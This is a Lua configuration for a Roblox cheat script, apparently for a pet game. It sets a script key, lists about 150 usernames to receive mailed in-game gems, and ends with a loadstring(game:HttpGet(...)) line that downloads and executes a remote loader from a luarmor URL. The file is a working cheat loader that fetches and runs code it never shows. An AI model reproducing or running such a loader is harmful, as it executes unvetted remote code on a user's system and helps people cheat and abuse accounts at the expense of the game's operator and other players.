script_key="WdeIbSCZEBXtxPjTnYmSkxTcHTPFVeSV";

getgenv().petsGoConfig = {
    DISCORD_ID = "",
    MAIL_UPGRADE_GEM_WEBHOOK_URL = "",

    MAIL_GEMS_USERNAME_LIST = {
"cinna_4o4", "resea4ii", "brewe5zb", "under1mw9", "sacra3ze", "agent11977", "popco_9xe",
"cloud4xu", "warli6be", "moonb9k5", "unexp9zw", "audib5kx", "obses4nz", "poiso7cm",
"endur4vx", "weak8xi", "confi1xs", "eleva1wz", "stubb_3zv", "jaunt1da", "deliv8x1",
"crazy6ns", "blata_86d", "clock_5ie", "enlar8db", "lukew1im", "alien8zk", "mongr959",
"delay3zx", "stoke5kz", "decei1t8", "chaos9mk", "anima1k3", "botan2xh", "capri9bk",
"curfe9bg", "tantr3kk", "quant181", "bladd9sx", "gusty8wh", "cluel5xw", "tamen4wz",
"decid9bi", "awnin7gs", "jingl3ct", "spear9xv", "duckb7n4", "Frenc2xm", "confu44z",
"serpe26k", "niece518", "neuro9kz", "fidge_1tx", "conge9mt", "shrin9z0", "untur72v",
"virtu_1kc", "felin7ua", "skyro9o7", "hexag_2nm", "rebui_6vm", "monum_8ww", "alibi21s",
"noxio7vd", "thaw2kz6", "noted97m", "sway7xa", "quadr_91w", "ascen13t", "impre4x9",
"entru7xu", "porti4di", "lappi2ev", "footl8vx", "vende6x4", "condu5co", "escal17k",
"clubb8bn", "viewl_6vg", "pod4vd", "therm71x", "short9kt", "brune8xw", "bulls7on",
"alrig15t", "stupi_6kx", "persu32s", "shaki_8w4", "subje72m", "male_18k", "stron17s",
"serio_9gm", "stagn4et", "quain_1s6", "munda8x8", "essen3hd", "dry2nh", "jingl7iu81",
"smoki60u", "engra8ko", "elf_2bx", "brown2ih", "rarit_29d", "next3xx", "petun8i9",
"ugly_1z6", "light8t75", "retra9zd", "yodel46o", "attem7kx", "headp6i7", "ensna6bc",
"accom1zd", "showc5z7", "kalei6mv", "calam2a9", "greed5ga", "proto4a3", "drink23166",
"extru5nw", "regio8sc", "acre8tn", "muppe1bo", "frank33m5", "delet3xx", "satis1a0",
"month9tk", "avert9sz", "concl88w", "hanke9gm", "clapp8ku", "encou210", "conve8zh",
"firm5gk", "cotta40i", "sands9bb", "ragge6vb", "platy4vb", "uncov7se", "elite_3ih",
"gaunt6h4", "satis1mx", "ancho6w34", "sage_75u", "brill4xe", "arres7d0", "aveng4kg",
"carve8ea", "spilt7oo"
    }  -- ONE TIME 370k GEMS MAIL FOR FULL DIAMOND UPGRADE
}

loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/1fcefa454021976ebb3a7ad670dfb077.lua"))()
